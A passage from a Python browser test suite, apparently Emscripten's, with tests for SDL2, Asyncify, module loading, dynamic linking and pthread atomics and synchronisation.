post_build=post_build) @requires_graphics_hardware def test_sdl2_ttf(self): shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir()) self.btest('sdl2_ttf.c', reference='sdl2_ttf.png', args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'], message='You should see colorful "hello" and "world" in the window') @requires_graphics_hardware def test_sdl2_ttf_rtl(self): shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir()) self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png', args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'], message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window') def test_sdl2_custom_cursor(self): shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp') self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2']) def test_sdl2_misc(self): self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2']) def test_sdl2_misc_main_module(self): self.btest_exit('sdl2_misc.c', args=['-sUSE_SDL=2', '-sMAIN_MODULE']) def test_sdl2_misc_via_object(self): self.run_process([EMCC, '-c', test_file('sdl2_misc.c'), '-sUSE_SDL=2', '-o', 'test.o']) self.compile_btest(['test.o', '-sEXIT_RUNTIME', '-sUSE_SDL=2', '-o', 'test.html']) self.run_browser('test.html', '...', '/report_result?exit:0') @parameterized({ 'dash_s': (['-sUSE_SDL=2', '-sUSE_SDL_MIXER=2'],), 'dash_l': (['-lSDL2', '-lSDL2_mixer'],), }) @requires_sound_hardware def test_sdl2_mixer_wav(self, flags): shutil.copyfile(test_file('sounds/the_entertainer.wav'), 'sound.wav') self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-sINITIAL_MEMORY=33554432'] + flags) @parameterized({ 'wav': ([], '0', 'the_entertainer.wav'), 'ogg': (['ogg'], 'MIX_INIT_OGG', 'alarmvictory_1.ogg'), 'mp3': (['mp3'], 'MIX_INIT_MP3', 'pudinha.mp3'), 'mod': (['mod'], 'MIX_INIT_MOD', 'bleep.xm'), # TODO: need to source freepats.cfg and a midi file # 'mod': (['mid'], 'MIX_INIT_MID', 'midi.mid'), }) @requires_sound_hardware def test_sdl2_mixer_music(self, formats, flags, music_name): shutil.copyfile(test_file('sounds', music_name), music_name) self.btest('sdl2_mixer_music.c', expected='1', args=[ '--preload-file', music_name, '-DSOUND_PATH=' + json.dumps(music_name), '-DFLAGS=' + flags, '-sUSE_SDL=2', '-sUSE_SDL_MIXER=2', '-sSDL2_MIXER_FORMATS=' + json.dumps(formats), '-sINITIAL_MEMORY=33554432' ]) @requires_graphics_hardware def test_cocos2d_hello(self): cocos2d_root = os.path.join(ports.Ports.get_build_dir(), 'cocos2d') preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@' self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1, args=['-sUSE_COCOS2D=3', '-sERROR_ON_UNDEFINED_SYMBOLS=0', '--preload-file', preload_file, '--use-preload-plugins', '-Wno-inconsistent-missing-override'], message='You should see Cocos2d logo') def test_async(self): for opts in [0, 1, 2, 3]: print(opts) self.btest_exit('browser/async.cpp', args=['-O' + str(opts), '-g2', '-sASYNCIFY']) def test_asyncify_tricky_function_sig(self): self.btest('browser/test_asyncify_tricky_function_sig.cpp', '85', args=['-sASYNCIFY_ONLY=[foo(char.const*?.int#),foo2(),main,__original_main]', '-sASYNCIFY=1']) @requires_threads def test_async_in_pthread(self): self.btest_exit('browser/async.cpp', args=['-sASYNCIFY', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-g']) def test_async_2(self): # Error.stackTraceLimit default to 10 in chrome but this test relies on more # than 40 stack frames being reported. create_file('pre.js', 'Error.stackTraceLimit = 80;\n') self.btest_exit('browser/async_2.cpp', args=['-O3', '--pre-js', 'pre.js', '-sASYNCIFY']) def test_async_virtual(self): for opts in [0, 3]: print(opts) self.btest_exit('browser/async_virtual.cpp', args=['-O' + str(opts), '-profiling', '-sASYNCIFY']) def test_async_virtual_2(self): for opts in [0, 3]: print(opts) self.btest_exit('browser/async_virtual_2.cpp', args=['-O' + str(opts), '-sASSERTIONS', '-sSAFE_HEAP', '-profiling', '-sASYNCIFY']) # Test async sleeps in the presence of invoke_* calls, which can happen with # longjmp or exceptions. @parameterized({ 'O0': ([],), # noqa 'O3': (['-O3'],), # noqa }) def test_async_longjmp(self, args): self.btest_exit('browser/async_longjmp.cpp', args=args + ['-sASYNCIFY']) def test_async_mainloop(self): for opts in [0, 3]: print(opts) self.btest_exit('browser/async_mainloop.cpp', args=['-O' + str(opts), '-sASYNCIFY']) @requires_sound_hardware def test_sdl_audio_beep_sleep(self): self.btest('sdl_audio_beep_sleep.cpp', '1', args=['-Os', '-sASSERTIONS', '-sDISABLE_EXCEPTION_CATCHING=0', '-profiling', '-sSAFE_HEAP', '-lSDL', '-sASYNCIFY'], timeout=90) def test_mainloop_reschedule(self): self.btest('mainloop_reschedule.cpp', '1', args=['-Os', '-sASYNCIFY']) def test_mainloop_infloop(self): self.btest('mainloop_infloop.cpp', '1', args=['-sASYNCIFY']) def test_async_iostream(self): self.btest('browser/async_iostream.cpp', '1', args=['-sASYNCIFY']) # Test an async return value. The value goes through a custom JS library # method that uses asyncify, and therefore it needs to be declared in # ASYNCIFY_IMPORTS. # To make the test more precise we also use ASYNCIFY_IGNORE_INDIRECT here. @parameterized({ 'normal': (['-sASYNCIFY_IMPORTS=[sync_tunnel, sync_tunnel_bool]'],), # noqa 'response': (['-sASYNCIFY_IMPORTS=@filey.txt'],), # noqa 'nothing': (['-DBAD'],), # noqa 'empty_list': (['-DBAD', '-sASYNCIFY_IMPORTS=[]'],), # noqa 'em_js_bad': (['-DBAD', '-DUSE_EM_JS'],), # noqa }) def test_async_returnvalue(self, args): if '@' in str(args): create_file('filey.txt', 'sync_tunnel\nsync_tunnel_bool\n') self.btest('browser/async_returnvalue.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_IGNORE_INDIRECT', '--js-library', test_file('browser/async_returnvalue.js')] + args + ['-sASSERTIONS']) def test_async_stack_overflow(self): self.btest('browser/async_stack_overflow.cpp', 'abort:RuntimeError: unreachable', args=['-sASYNCIFY', '-sASYNCIFY_STACK_SIZE=4']) def test_async_bad_list(self): self.btest('browser/async_bad_list.cpp', '0', args=['-sASYNCIFY', '-sASYNCIFY_ONLY=[waka]', '--profiling']) # Tests that when building with -sMINIMAL_RUNTIME, the build can use -sMODULARIZE as well. def test_minimal_runtime_modularize(self): self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sMODULARIZE', '-sMINIMAL_RUNTIME']) self.run_browser('test.html', None, '/report_result?0') # Tests that when building with -sMINIMAL_RUNTIME, the build can use -sEXPORT_NAME=Foo as well. def test_minimal_runtime_export_name(self): self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-sEXPORT_NAME=Foo', '-sMINIMAL_RUNTIME']) self.run_browser('test.html', None, '/report_result?0') @requires_sync_compilation def test_modularize(self): for opts in [ [], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1'] ]: for args, code in [ # defaults ([], ''' let promise = Module(); if (!promise instanceof Promise) throw new Error('Return value should be a promise'); '''), # use EXPORT_NAME (['-sEXPORT_NAME="HelloWorld"'], ''' if (typeof Module !== "undefined") throw "what?!"; // do not pollute the global scope, we are modularized! HelloWorld.noInitialRun = true; // errorneous module capture will load this and cause timeout let promise = HelloWorld(); if (!promise instanceof Promise) throw new Error('Return value should be a promise'); '''), # pass in a Module option (which prevents main(), which we then invoke ourselves) (['-sEXPORT_NAME="HelloWorld"'], ''' HelloWorld({ noInitialRun: true }).then(hello => { hello._main(); }); '''), # Even without a mem init file, everything is async (['-sEXPORT_NAME="HelloWorld"', '--memory-init-file', '0'], ''' HelloWorld({ noInitialRun: true }).then(hello => { hello._main(); }); '''), ]: print('test on', opts, args, code) # this test is synchronous, so avoid async startup due to wasm features self.compile_btest([test_file('browser_test_hello_world.c'), '-sMODULARIZE', '-sSINGLE_FILE'] + args + opts) create_file('a.html', ''' <script src="a.out.js"></script> <script> %s </script> ''' % code) self.run_browser('a.html', '...', '/report_result?0') def test_modularize_network_error(self): test_c_path = test_file('browser_test_hello_world.c') browser_reporting_js_path = test_file('browser_reporting.js') self.compile_btest([test_c_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE) create_file('a.html', ''' <script src="a.out.js"></script> <script> createModule() .then(() => { reportResultToServer("Module creation succeeded when it should have failed"); }) .catch(err => { reportResultToServer(err.message); }); </script> ''') print('Deleting a.out.wasm to cause a download error') os.remove('a.out.wasm') self.run_browser('a.html', '...', '/report_result?Aborted(both async and sync fetching of the wasm failed)') def test_modularize_init_error(self): test_cpp_path = test_file('browser/test_modularize_init_error.cpp') browser_reporting_js_path = test_file('browser_reporting.js') self.compile_btest([test_cpp_path, '-sMODULARIZE', '-sEXPORT_NAME="createModule"', '--extern-pre-js', browser_reporting_js_path], reporting=Reporting.NONE) create_file('a.html', ''' <script src="a.out.js"></script> <script> if (typeof window === 'object') { window.addEventListener('unhandledrejection', function(event) { reportResultToServer("Unhandled promise rejection: " + event.reason.message); }); } createModule() .then(() => { reportResultToServer("Module creation succeeded when it should have failed"); }) .catch(err => { reportResultToServer(err); }); </script> ''') self.run_browser('a.html', '...', '/report_result?intentional error to test rejection') # test illustrating the regression on the modularize feature since commit c5af8f6 # when compiling with the --preload-file option def test_modularize_and_preload_files(self): self.set_setting('EXIT_RUNTIME') # TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0 self.ldflags.remove('-sCLOSURE_WARNINGS=error') # amount of memory different from the default one that will be allocated for the emscripten heap totalMemory = 33554432 for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2'], ['-O2', '--closure=1']]: # the main function simply checks that the amount of allocated heap memory is correct create_file('test.c', r''' #include <stdio.h> #include <emscripten.h> int main() { EM_ASM({ // use eval here in order for the test with closure compiler enabled to succeed var totalMemory = Module['INITIAL_MEMORY']; assert(totalMemory === %d, 'bad memory size'); }); return 0; } ''' % totalMemory) # generate a dummy file create_file('dummy_file', 'dummy') # compile the code with the modularize feature and the preload-file option enabled # no wasm, since this tests customizing total memory at runtime self.compile_btest(['test.c', '-sWASM=0', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts, reporting=Reporting.JS_ONLY) create_file('a.html', ''' <script src="a.out.js"></script> <script> // instantiate the Foo module with custom INITIAL_MEMORY value var foo = Foo({ INITIAL_MEMORY: %d }); </script> ''' % totalMemory) self.run_browser('a.html', '...', '/report_result?exit:0') def test_webidl(self): # see original in test_core.py self.run_process([WEBIDL_BINDER, test_file('webidl/test.idl'), 'glue']) self.assertExists('glue.cpp') self.assertExists('glue.js') for opts in [[], ['-O1'], ['-O2']]: print(opts) self.btest(Path('webidl/test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts) @requires_sync_compilation def test_dynamic_link(self): create_file('main.c', r''' #include <stdio.h> #include <stdlib.h> #include <string.h> #include <emscripten.h> char *side(const char *data); int main() { char *temp = side("hello through side\n"); char *ret = (char*)malloc(strlen(temp)+1); strcpy(ret, temp); temp[1] = 'x'; EM_ASM({ Module.realPrint = out; out = function(x) { if (!Module.printed) Module.printed = x; Module.realPrint(x); }; }); puts(ret); EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); }); return 0; } ''') create_file('side.c', r''' #include <stdlib.h> #include <string.h> char *side(const char *data); char *side(const char *data) { char *ret = (char*)malloc(strlen(data)+1); strcpy(ret, data); return ret; } ''') self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm']) self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', 'side.wasm']) print('wasm in worker (we can read binary data synchronously there)') self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm']) self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '--proxy-to-worker', 'side.wasm']) print('wasm (will auto-preload since no sync binary reading)') # same wasm side module works self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sEXPORT_ALL', 'side.wasm']) def test_dlopen_async(self): create_file('side.c', 'int foo = 42;\n') self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE']) self.btest_exit(test_file('other/test_dlopen_async.c'), args=['-sMAIN_MODULE=2']) def test_dlopen_blocking(self): create_file('side.c', 'int foo = 42;\n') self.run_process([EMCC, 'side.c', '-o', 'libside.so', '-sSIDE_MODULE', '-sUSE_PTHREADS', '-Wno-experimental']) # Attempt to use dlopen the side module (without preloading) should fail on the main thread # since the syncronous `readBinary` function does not exist. self.btest_exit(test_file('other/test_dlopen_blocking.c'), assert_returncode=1, args=['-sMAIN_MODULE=2']) # But with PROXY_TO_PTHEAD it does work, since we can do blocking and sync XHR in a worker. self.btest_exit(test_file('other/test_dlopen_blocking.c'), args=['-sMAIN_MODULE=2', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-Wno-experimental']) # verify that dynamic linking works in all kinds of in-browser environments. # don't mix different kinds in a single test. @parameterized({ '': ([0],), 'inworker': ([1],), }) def test_dylink_dso_needed(self, inworker): self.emcc_args += ['-O2'] # --proxy-to-worker only on main if inworker: self.emcc_args += ['--proxy-to-worker'] def do_run(src, expected_output, emcc_args=[]): # XXX there is no infrastructure (yet ?) to retrieve stdout from browser in tests. # -> do the assert about expected output inside browser. # # we have to put the hook into post.js because in main it is too late # (in main we won't be able to catch what static constructors inside # linked dynlibs printed), and in pre.js it is too early (out is not yet # setup by the shell). create_file('post.js', r''' Module.realPrint = out; out = function(x) { if (!Module.printed) Module.printed = ""; Module.printed += x + '\n'; // out is passed str without last \n Module.realPrint(x); }; ''') create_file('test_dylink_dso_needed.c', src + r''' #include <emscripten/em_asm.h> int main() { int rtn = test_main(); EM_ASM({ var expected = %r; assert(Module.printed === expected, ['stdout expected:', expected]); }); return rtn; } ''' % expected_output) self.btest_exit(self.in_dir('test_dylink_dso_needed.c'), args=self.get_emcc_args() + ['--post-js', 'post.js'] + emcc_args) self._test_dylink_dso_needed(do_run) @requires_graphics_hardware @requires_sync_compilation def test_dynamic_link_glemu(self): create_file('main.c', r''' #include <stdio.h> #include <string.h> #include <assert.h> const char *side(); int main() { const char *exts = side(); puts(side()); assert(strstr(exts, "GL_EXT_texture_env_combine")); return 0; } ''') create_file('side.c', r''' #include "SDL/SDL.h" #include "SDL/SDL_opengl.h" const char *side() { SDL_Init(SDL_INIT_VIDEO); SDL_SetVideoMode(600, 600, 16, SDL_OPENGL); return (const char *)glGetString(GL_EXTENSIONS); } ''') self.run_process([EMCC, 'side.c', '-sSIDE_MODULE', '-O2', '-o', 'side.wasm', '-lSDL']) self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', '-O2', '-sLEGACY_GL_EMULATION', '-lSDL', '-lGL', 'side.wasm']) def test_dynamic_link_many(self): # test asynchronously loading two side modules during startup create_file('main.c', r''' #include <assert.h> int side1(); int side2(); int main() { assert(side1() == 1); assert(side2() == 2); return 0; } ''') create_file('side1.c', r''' int side1() { return 1; } ''') create_file('side2.c', r''' int side2() { return 2; } ''') self.run_process([EMCC, 'side1.c', '-sSIDE_MODULE', '-o', 'side1.wasm']) self.run_process([EMCC, 'side2.c', '-sSIDE_MODULE', '-o', 'side2.wasm']) self.btest_exit(self.in_dir('main.c'), args=['-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm']) def test_dynamic_link_pthread_many(self): # Test asynchronously loading two side modules during startup # They should always load in the same order # Verify that function pointers in the browser's main thread # reffer to the same function as in a pthread worker. # The main thread function table is populated asynchronously # in the browser's main thread. However, it should still be # populated in the same order as in a pthread worker to # guarantee function pointer interop. create_file('main.cpp', r''' #include <cassert> #include <thread> #include <emscripten/emscripten.h> int side1(); int side2(); int main() { auto side1_ptr = &side1; auto side2_ptr = &side2; // Don't join the thread since this is running in the // browser's main thread. std::thread([=]{ assert(side1_ptr == &side1); assert(side2_ptr == &side2); emscripten_force_exit(0); }).detach(); emscripten_exit_with_live_runtime(); } ''') # The browser will try to load side1 first. # Use a big payload in side1 so that it takes longer to load than side2 create_file('side1.cpp', r''' char const * payload1 = "''' + str(list(range(1, int(1e5)))) + r'''"; int side1() { return 1; } ''') create_file('side2.cpp', r''' char const * payload2 = "0"; int side2() { return 2; } ''') self.run_process([EMCC, 'side1.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side1.wasm']) self.run_process([EMCC, 'side2.cpp', '-Wno-experimental', '-pthread', '-sSIDE_MODULE', '-o', 'side2.wasm']) self.btest_exit(self.in_dir('main.cpp'), args=['-Wno-experimental', '-pthread', '-sMAIN_MODULE=2', 'side1.wasm', 'side2.wasm']) def test_memory_growth_during_startup(self): create_file('data.dat', 'X' * (30 * 1024 * 1024)) self.btest('browser_test_hello_world.c', '0', args=['-sASSERTIONS', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=16MB', '-sTOTAL_STACK=16384', '--preload-file', 'data.dat']) # pthreads tests def prep_no_SAB(self): create_file('html.html', read_file(path_from_root('src/shell_minimal.html')).replace('''<body>''', '''<body> <script> SharedArrayBuffer = undefined; Atomics = undefined; </script> ''')) @requires_threads def test_pthread_c11_threads(self): self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'), args=['-gsource-map', '-std=gnu11', '-xc', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sTOTAL_MEMORY=64mb']) @requires_threads def test_pthread_pool_size_strict(self): # Check that it doesn't fail with sufficient number of threads in the pool. self.btest_exit(test_file('pthread/test_pthread_c11_threads.c'), args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb']) # Check that it fails instead of deadlocking on insufficient number of threads in the pool. self.btest(test_file('pthread/test_pthread_c11_threads.c'), expected='abort:Assertion failed: thrd_create(&t4, thread_main, NULL) == thrd_success', args=['-g2', '-xc', '-std=gnu11', '-pthread', '-sPTHREAD_POOL_SIZE=3', '-sPTHREAD_POOL_SIZE_STRICT=2', '-sTOTAL_MEMORY=64mb']) @requires_threads def test_pthread_in_pthread_pool_size_strict(self): # Check that it fails when there's a pthread creating another pthread. self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=2', '-sPTHREAD_POOL_SIZE_STRICT=2']) # Check that it fails when there's a pthread creating another pthread. self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-g2', '-pthread', '-sPTHREAD_POOL_SIZE=1', '-sPTHREAD_POOL_SIZE_STRICT=2', '-DSMALL_POOL']) # Test that the emscripten_ atomics api functions work. @parameterized({ 'normal': ([],), 'closure': (['--closure=1'],), }) @requires_threads def test_pthread_atomics(self, args=[]): self.btest_exit(test_file('pthread/test_pthread_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-g1'] + args) # Test 64-bit atomics. @requires_threads def test_pthread_64bit_atomics(self): self.btest_exit(test_file('pthread/test_pthread_64bit_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test 64-bit C++11 atomics. @parameterized({ '': ([],), 'O3': (['-O3'],) }) @requires_threads def test_pthread_64bit_cxx11_atomics(self, opt): for pthreads in [[], ['-sUSE_PTHREADS']]: self.btest_exit(test_file('pthread/test_pthread_64bit_cxx11_atomics.cpp'), args=opt + pthreads) # Test c++ std::thread::hardware_concurrency() @requires_threads def test_pthread_hardware_concurrency(self): self.btest_exit(test_file('pthread/test_pthread_hardware_concurrency.cpp'), args=['-O2', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE="navigator.hardwareConcurrency"']) @parameterized({ 'join': ('join',), 'wait': ('wait',), }) @requires_threads def test_pthread_main_thread_blocking(self, name): print('Test that we error if not ALLOW_BLOCKING_ON_MAIN_THREAD') self.btest(test_file('pthread/main_thread_%s.cpp' % name), expected='abort:Blocking on the main thread is not allowed by default.', args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0']) if name == 'join': print('Test that by default we just warn about blocking on the main thread.') self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE']) print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD') self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0']) print('Test that tryjoin is fine, even if not ALLOW_BLOCKING_ON_MAIN_THREAD, and even without a pool') self.btest_exit(test_file('pthread/main_thread_join.cpp'), assert_returncode=2, args=['-O3', '-sUSE_PTHREADS', '-g', '-DTRY_JOIN', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0']) print('Test that everything works ok when we are on a pthread.') self.btest_exit(test_file('pthread/main_thread_%s.cpp' % name), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sPROXY_TO_PTHREAD', '-sALLOW_BLOCKING_ON_MAIN_THREAD=0']) # Test the old GCC atomic __sync_fetch_and_op builtin operations. @requires_threads def test_pthread_gcc_atomic_fetch_and_op(self): self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed'] for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-Os']]: for debug in [[], ['-g']]: args = opt + debug print(args) self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_fetch_and_op.cpp'), args=args + ['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # 64 bit version of the above test. @also_with_wasm2js @requires_threads def test_pthread_gcc_64bit_atomic_fetch_and_op(self): if not self.is_wasm(): self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358') self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed'] self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test the old GCC atomic __sync_op_and_fetch builtin operations. @also_with_wasm2js @requires_threads def test_pthread_gcc_atomic_op_and_fetch(self): self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed'] self.btest_exit(test_file('pthread/test_pthread_gcc_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # 64 bit version of the above test. @also_with_wasm2js @requires_threads def test_pthread_gcc_64bit_atomic_op_and_fetch(self): if not self.is_wasm(): self.skipTest('https://github.com/WebAssembly/binaryen/issues/4358') self.emcc_args += ['-Wno-sync-fetch-and-nand-semantics-changed', '--profiling-funcs'] self.btest_exit(test_file('pthread/test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-O2', '-sPTHREAD_POOL_SIZE=8']) # Tests the rest of the remaining GCC atomics after the two above tests. @also_with_wasm2js @requires_threads def test_pthread_gcc_atomics(self): self.btest_exit(test_file('pthread/test_pthread_gcc_atomics.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test the __sync_lock_test_and_set and __sync_lock_release primitives. @also_with_wasm2js @requires_threads def test_pthread_gcc_spinlock(self): for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]: self.btest_exit(test_file('pthread/test_pthread_gcc_spinlock.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg) # Test that basic thread creation works. @requires_threads def test_pthread_create(self): def test(args): print(args) self.btest_exit(test_file('pthread/test_pthread_create.cpp'), args=['-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + args, extra_tries=0) # this should be 100% deterministic print() # new line test([]) test(['-O3']) # TODO: re-enable minimal runtime once the flakiness is figure out, # https://github.com/emscripten-core/emscripten/issues/12368 # test(['-sMINIMAL_RUNTIME']) # Test that preallocating worker threads work. @requires_threads def test_pthread_preallocates_workers(self): self.btest_exit(test_file('pthread/test_pthread_preallocates_workers.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=4', '-sPTHREAD_POOL_DELAY_LOAD']) # Test that allocating a lot of threads doesn't regress. This needs to be checked manually! @requires_threads def test_pthread_large_pthread_allocation(self): self.btest_exit(test_file('pthread/test_large_pthread_allocation.cpp'), args=['-sINITIAL_MEMORY=128MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=50'], message='Check output from test to ensure that a regression in time it takes to allocate the threads has not occurred.') # Tests the -sPROXY_TO_PTHREAD option. @requires_threads def test_pthread_proxy_to_pthread(self): self.btest_exit(test_file('pthread/test_pthread_proxy_to_pthread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']) # Test that a pthread can spawn another pthread of its own. @requires_threads def test_pthread_create_pthread(self): for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]: self.btest_exit(test_file('pthread/test_pthread_create_pthread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'] + modularize) # Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created. @requires_threads def test_pthread_nested_spawns(self): self.btest_exit(test_file('pthread/test_pthread_nested_spawns.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2']) # Test that main thread can wait for a pthread to finish via pthread_join(). @requires_threads def test_pthread_join(self): self.btest_exit(test_file('pthread/test_pthread_join.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test that threads can rejoin the pool once detached and finished @requires_threads def test_std_thread_detach(self): self.btest_exit(test_file('pthread/test_std_thread_detach.cpp'), args=['-sUSE_PTHREADS']) # Test pthread_cancel() operation @requires_threads def test_pthread_cancel(self): self.btest_exit(test_file('pthread/test_pthread_cancel.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test that pthread_cancel() cancels pthread_cond_wait() operation @requires_threads def test_pthread_cancel_cond_wait(self): self.btest_exit(test_file('pthread/test_pthread_cancel_cond_wait.cpp'), assert_returncode=1, args=['-O3', '-sUSE_PTHREADS=1', '-sPTHREAD_POOL_SIZE=8']) # Test pthread_kill() operation @no_chrome('pthread_kill hangs chrome renderer, and keep subsequent tests from passing') @requires_threads def test_pthread_kill(self): self.btest_exit(test_file('pthread/test_pthread_kill.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test that pthread cleanup stack (pthread_cleanup_push/_pop) works. @requires_threads def test_pthread_cleanup(self): self.btest_exit(test_file('pthread/test_pthread_cleanup.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Tests the pthread mutex api. @requires_threads def test_pthread_mutex(self): for arg in [[], ['-DSPINLOCK_TEST']]: self.btest_exit(test_file('pthread/test_pthread_mutex.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'] + arg) @requires_threads def test_pthread_attr_getstack(self): self.btest_exit(test_file('pthread/test_pthread_attr_getstack.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2']) # Test that memory allocation is thread-safe. @requires_threads def test_pthread_malloc(self): self.btest_exit(test_file('pthread/test_pthread_malloc.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data. @requires_threads def test_pthread_malloc_free(self): self.btest_exit(test_file('pthread/test_pthread_malloc_free.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8', '-sINITIAL_MEMORY=256MB']) # Test that the pthread_barrier API works ok. @requires_threads def test_pthread_barrier(self): self.btest_exit(test_file('pthread/test_pthread_barrier.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test the pthread_once() function. @requires_threads def test_pthread_once(self): self.btest_exit(test_file('pthread/test_pthread_once.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8']) # Test against a certain thread exit time handling bug by spawning tons of threads. @requires_threads def test_pthread_spawns(self): self.btest_exit(test_file('pthread/test_pthread_spawns.cpp'), args=['-sINITIAL_MEMORY=64MB', '-O3', '-sUSE_PTHREADS', 